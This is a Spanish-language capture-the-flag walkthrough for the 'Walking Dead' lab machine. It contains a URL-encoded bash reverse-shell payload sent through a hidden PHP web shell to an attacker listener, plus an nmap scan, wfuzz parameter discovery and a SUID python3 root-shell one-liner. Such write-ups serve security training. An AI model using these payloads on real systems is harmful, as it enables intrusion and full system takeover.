> For the complete documentation index, see [llms.txt](https://shinki-organization.gitbook.io/dw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://shinki-organization.gitbook.io/dw/write-ups/quickstart/maquinas-faciles/walking-dead-write-up.md).

# Walking Dead write-up

## **Verificamos conexión con la máquina víctima**

<figure><img src="/files/iyHwSvx6bv9iP4PZ8sPO" alt=""><figcaption></figcaption></figure>

## **Realizamos un escaneo para identificar los puertos abiertos de la máquina víctima**

Utilizamos **nmap** para escanear los puertos abiertos de la máquina víctima con el siguiente comando:

```bash
sudo nmap -p- -sCVS --min-rate=5000 -vvv -Pn -n -O 172.17.0.2
```

<figure><img src="/files/gCZ0ukdzSDXUhp6YpHAF" alt=""><figcaption></figcaption></figure>

El escaneo nos indica que el puerto 22 (SSH) y el 80 (HTTP) están abiertos. Así que ingresamos la IP de la máquina víctima en el navegador y contemplamos lo siguiente:

<figure><img src="/files/P2bQmBnxx7nVBVob5iUn" alt=""><figcaption></figcaption></figure>

Aparentemente no hay nada interesante, pero si vamos al código fuente observamos lo siguiente:

<figure><img src="/files/NhrBIpXBUDGj8d4fdkVc" alt=""><figcaption></figcaption></figure>

Así que ingresamos la ruta <http://172.17.0.2/hidden/.shell.php> en el navegador y observamos lo siguiente:

<figure><img src="/files/yeNhfcSsTbiRVFBOM7uf" alt=""><figcaption></figcaption></figure>

Usaremos ahora la herramienta **wfuzz** para identificar un parámetro con el que podamos ejecutar comandos. Para ello, ejecutamos este comando:

```bash
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u 172.17.0.2/hidden/.shell.php?FUZZ=whoami --hl 0
```

<figure><img src="/files/YYZUhVhL2jIWr8QbRUVj" alt=""><figcaption></figcaption></figure>

Esto nos indica que podemos ejecutar comandos con el parámetro `cmd`. Por lo tanto vamos a ponernos en escucha con **netcat** por el puerto 4444, ejecutando este comando:

```bash
sudo nc -nlvvp 4444
```

Y a continuación, ingresamos la siguiente dirección en el navegador:

```url
http://172.17.0.2/hidden/.shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F4444%200%3E%261%27
```

<figure><img src="/files/ot9TOukKK2gGiPzJkJAs" alt=""><figcaption></figcaption></figure>

## **Escalada de privilegios**

Una vez dentro de la máquina víctima, ejecutamos el comando `find / -perm -4000 -ls 2>/dev/null`, el cual nos indica que podemos ejecutar el binario `/usr/bin/python3.8` como el usuario root.

<figure><img src="/files/IKrY7WzJfHm9JyQYJ6tU" alt=""><figcaption></figcaption></figure>

Así que ahora ejecutamos lo siguiente y ya obtendríamos una shell con privilegios elevados:

```bash
python3 -c 'import os ; os.execl("/bin/bash", "bash", "-p")'
```

<figure><img src="/files/9xljSdLIBQ1Etl4fpZJt" alt=""><figcaption></figcaption></figure>
